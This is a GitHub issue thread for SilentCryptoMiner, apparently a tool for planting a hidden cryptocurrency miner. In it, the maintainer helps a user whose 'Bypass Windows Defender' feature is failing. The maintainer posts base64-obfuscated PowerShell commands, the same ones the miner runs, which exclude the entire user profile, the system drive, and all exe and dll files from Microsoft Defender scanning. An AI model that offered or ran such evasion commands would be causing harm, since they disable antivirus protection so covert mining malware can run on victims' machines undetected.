### ISSUE TITLE
the function does not work

### ISSUE THREAD

**Issue by monerrrr123** [UnamSanctam/SilentCryptoMiner#357]
the add to exceptions function of windows does not work (does not add a file to exceptions
![image](https://user-images.githubusercontent.com/98605999/152239674-f4840048-fb95-4251-88fb-5eb704924d5f.png)

**Comment by UnamSanctam** [comment]
And you have "Bypass Windows Defender" enabled and it's running as administrator?

**Comment by monerrrr123** [comment]
yes

**Comment by UnamSanctam** [comment]
Can you try running this in an administrator CMD?
```
cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
```
It's the same command(s) that the miner runs.

**Comment by monerrrr123** [comment]
![image](https://user-images.githubusercontent.com/98605999/152299833-50d4ba67-68f2-46ff-bff6-ee6631468dae.png)
are you taking a commission for yourself?  then why are there such drawdowns all the time

**Comment by UnamSanctam** [comment]
Because that's how pools work, it shows the shares you submit and not the actual hashrate. Those spikes in the graph is when you submit a share, I've written more about how pools work in the wiki: https://github.com/UnamSanctam/SilentCryptoMiner/wiki#why-is-the-hashrate-shown-on-the-pool-different-from-what-i-expect-or-from-what-is-shown-in-the-web-panel.

**Comment by Gopnitsa** [comment]
> ![image](https://user-images.githubusercontent.com/98605999/152299833-50d4ba67-68f2-46ff-bff6-ee6631468dae.png) are you taking a commission for yourself? then why are there such drawdowns all the time

Bro i need your help. Can you help me ?? Discord: Gopnitsa#0116
